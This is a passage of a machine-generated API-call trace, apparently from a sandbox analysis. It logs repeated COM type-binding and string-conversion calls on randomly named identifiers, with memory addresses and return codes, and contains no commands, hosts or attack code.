_DstSizeInBytes=0x7, _Src=0x55713fe | out: _Dst=0x87fcc50) returned 0x0 [0060.964] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea2072, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_rc9Dfw") returned 14 [0060.964] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_rc9Dfw", lHashVal=0x1059f8, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.964] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55713fe | out: _Dst=0x343ddc) returned 0x0 [0060.964] CRetailMalloc_Free () returned 0x7940201 [0060.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571422, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="BeJCWN") returned 7 [0060.965] ITypeComp:RemoteBind (in: This=0x87cef08, szName="BeJCWN", lHashVal=0x10b5b1, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x644 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x644) returned 0x0 [0060.965] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.965] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571422 | out: _Dst=0x87fcc50) returned 0x0 [0060.965] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea209e, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_BeJCWN") returned 14 [0060.966] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_BeJCWN", lHashVal=0x10301b, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.966] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571422 | out: _Dst=0x343ddc) returned 0x0 [0060.966] CRetailMalloc_Free () returned 0x7940201 [0060.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571446, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="caqvt") returned 6 [0060.966] ITypeComp:RemoteBind (in: This=0x87cef08, szName="caqvt", lHashVal=0x109293, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x646 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x646) returned 0x0 [0060.967] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.967] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5571446 | out: _Dst=0x87fcc50) returned 0x0 [0060.967] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea20ca, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_caqvt") returned 13 [0060.967] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_caqvt", lHashVal=0x105680, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.967] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5571446 | out: _Dst=0x343ddc) returned 0x0 [0060.967] CRetailMalloc_Free () returned 0x7940201 [0060.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557146a, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="XSQ54") returned 6 [0060.968] ITypeComp:RemoteBind (in: This=0x87cef08, szName="XSQ54", lHashVal=0x106be3, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x648 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x648) returned 0x0 [0060.968] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.968] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x557146a | out: _Dst=0x87fcc50) returned 0x0 [0060.969] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea20f6, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_XSQ54") returned 13 [0060.969] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_XSQ54", lHashVal=0x102fd0, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.969] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x557146a | out: _Dst=0x343ddc) returned 0x0 [0060.969] CRetailMalloc_Free () returned 0x7940201 [0060.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557148e, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="IhKA38g") returned 8 [0060.970] ITypeComp:RemoteBind (in: This=0x87cef08, szName="IhKA38g", lHashVal=0x1087b4, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x64a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x64a) returned 0x0 [0060.970] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.970] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557148e | out: _Dst=0x87fcc50) returned 0x0 [0060.971] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea2122, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_IhKA38g") returned 15 [0060.971] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_IhKA38g", lHashVal=0x108b38, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.971] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557148e | out: _Dst=0x343ddc) returned 0x0 [0060.971] CRetailMalloc_Free () returned 0x7940201 [0060.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55714b2, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="trqhv3uO") returned 9 [0060.972] ITypeComp:RemoteBind (in: This=0x87cef08, szName="trqhv3uO", lHashVal=0x10eea7, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x64c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x64c) returned 0x0 [0060.972] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.972] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x55714b2 | out: _Dst=0x87fcc50) returned 0x0 [0060.972] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea214e, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_trqhv3uO") returned 16 [0060.973] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_trqhv3uO", lHashVal=0x10c630, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.973] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x55714b2 | out: _Dst=0x343ddc) returned 0x0 [0060.973] CRetailMalloc_Free () returned 0x7940201 [0060.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55714da, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="yqy8bot0") returned 9 [0060.973] ITypeComp:RemoteBind (in: This=0x87cef08, szName="yqy8bot0", lHashVal=0x1007a3, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x64e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x64e) returned 0x0 [0060.973] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.973] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x55714da | out: _Dst=0x87fcc50) returned 0x0 [0060.974] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea217a, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_yqy8bot0") returned 16 [0060.974] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_yqy8bot0", lHashVal=0x10df6b, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.974] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x55714da | out: _Dst=0x343ddc) returned 0x0 [0060.974] CRetailMalloc_Free () returned 0x7940201 [0060.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571502, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="kUYf7j") returned 7 [0060.975] ITypeComp:RemoteBind (in: This=0x87cef08, szName="kUYf7j", lHashVal=0x102a45, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x650 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x650) returned 0x0 [0060.975] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.975] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571502 | out: _Dst=0x87fcc50) returned 0x0 [0060.976] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea21a6, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_kUYf7j") returned 14 [0060.976] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_kUYf7j", lHashVal=0x10a4ee, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.976] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571502 | out: _Dst=0x343ddc) returned 0x0 [0060.976] CRetailMalloc_Free () returned 0x7940201 [0060.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571526, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="zR8Ucb") returned 7 [0060.977] ITypeComp:RemoteBind (in: This=0x87cef08, szName="zR8Ucb", lHashVal=0x10b653, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x652 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x652) returned 0x0 [0060.977] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.977] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571526 | out: _Dst=0x87fcc50) returned 0x0 [0060.977] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea21d2, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_zR8Ucb") returned 14 [0060.978] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_zR8Ucb", lHashVal=0x1030bd, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.978] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571526 | out: _Dst=0x343ddc) returned 0x0 [0060.978] CRetailMalloc_Free () returned 0x7940201 [0060.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557154a, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="KXiMY") returned 6 [0060.979] ITypeComp:RemoteBind (in: This=0x87cef08, szName="KXiMY", lHashVal=0x10b858, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x654 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x654) returned 0x0 [0060.979] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.979] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x557154a | out: _Dst=0x87fcc50) returned 0x0 [0060.979] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea21fe, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_KXiMY") returned 13 [0060.980] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_KXiMY", lHashVal=0x107c45, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.980] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x557154a | out: _Dst=0x343ddc) returned 0x0 [0060.980] CRetailMalloc_Free () returned 0x7940201 [0060.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557156e, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="oOAq5He") returned 8 [0060.981] ITypeComp:RemoteBind (in: This=0x87cef08, szName="oOAq5He", lHashVal=0x104a27, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x656 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x656) returned 0x0 [0060.981] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.981] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557156e | out: _Dst=0x87fcc50) returned 0x0 [0060.981] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea222a, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_oOAq5He") returned 15 [0060.981] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_oOAq5He", lHashVal=0x104dab, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.982] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557156e | out: _Dst=0x343ddc) returned 0x0 [0060.982] CRetailMalloc_Free () returned 0x7940201 [0060.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571592, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="AQtWHwNb") returned 9 [0060.982] ITypeComp:RemoteBind (in: This=0x87cef08, szName="AQtWHwNb", lHashVal=0x10e2fb, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x658 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x658) returned 0x0 [0060.982] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.983] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5571592 | out: _Dst=0x87fcc50) returned 0x0 [0060.983] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea2256, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_AQtWHwNb") returned 16 [0060.983] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_AQtWHwNb", lHashVal=0x10ba84, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.983] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5571592 | out: _Dst=0x343ddc) returned 0x0 [0060.983] CRetailMalloc_Free () returned 0x7940201 [0060.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55715ba, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="ztSIyA") returned 7 [0060.984] ITypeComp:RemoteBind (in: This=0x87cef08, szName="ztSIyA", lHashVal=0x1075bf, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x65a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x65a) returned 0x0 [0060.984] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.984] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x55715ba | out: _Dst=0x87fcc50) returned 0x0 [0060.985] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea2282, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_ztSIyA") returned 14 [0060.985] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_ztSIyA", lHashVal=0x10f068, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.985] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55715ba | out: _Dst=0x343ddc) returned 0x0 [0060.985] CRetailMalloc_Free () returned 0x7940201 [0060.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55715de, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="tfZmYT") returned 7 [0060.986] ITypeComp:RemoteBind (in: This=0x87cef08, szName="tfZmYT", lHashVal=0x107004, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x65c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x65c) returned 0x0 [0060.986] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.986] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x55715de | out: _Dst=0x87fcc50) returned 0x0 [0060.987] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea22ae, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_tfZmYT") returned 14 [0060.987] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_tfZmYT", lHashVal=0x10eaad, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.987] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55715de | out: _Dst=0x343ddc) returned 0x0 [0060.987] CRetailMalloc_Free () returned 0x7940201 [0060.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571602, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="geZEBa") returned 7 [0060.988] ITypeComp:RemoteBind (in: This=0x87cef08, szName="geZEBa", lHashVal=0x10899d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x65e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x65e) returned 0x0 [0060.988] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.988] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571602 | out: _Dst=0x87fcc50) returned 0x0 [0060.988] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea22da, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_geZEBa") returned 14 [0060.988] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_geZEBa", lHashVal=0x100407, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.989] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571602 | out: _Dst=0x343ddc) returned 0x0 [0060.989] CRetailMalloc_Free () returned 0x7940201 [0060.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571626, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="HJDnEL7") returned 8 [0060.989] ITypeComp:RemoteBind (in: This=0x87cef08, szName="HJDnEL7", lHashVal=0x10dd09, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x660 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x660) returned 0x0 [0060.989] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.990] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5571626 | out: _Dst=0x87fcc50) returned 0x0 [0060.990] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea2306, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_HJDnEL7") returned 15 [0060.990] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_HJDnEL7", lHashVal=0x10e08d, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.990] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5571626 | out: _Dst=0x343ddc) returned 0x0 [0060.990] CRetailMalloc_Free () returned 0x7940201 [0060.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557164a, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="e0cLy") returned 6 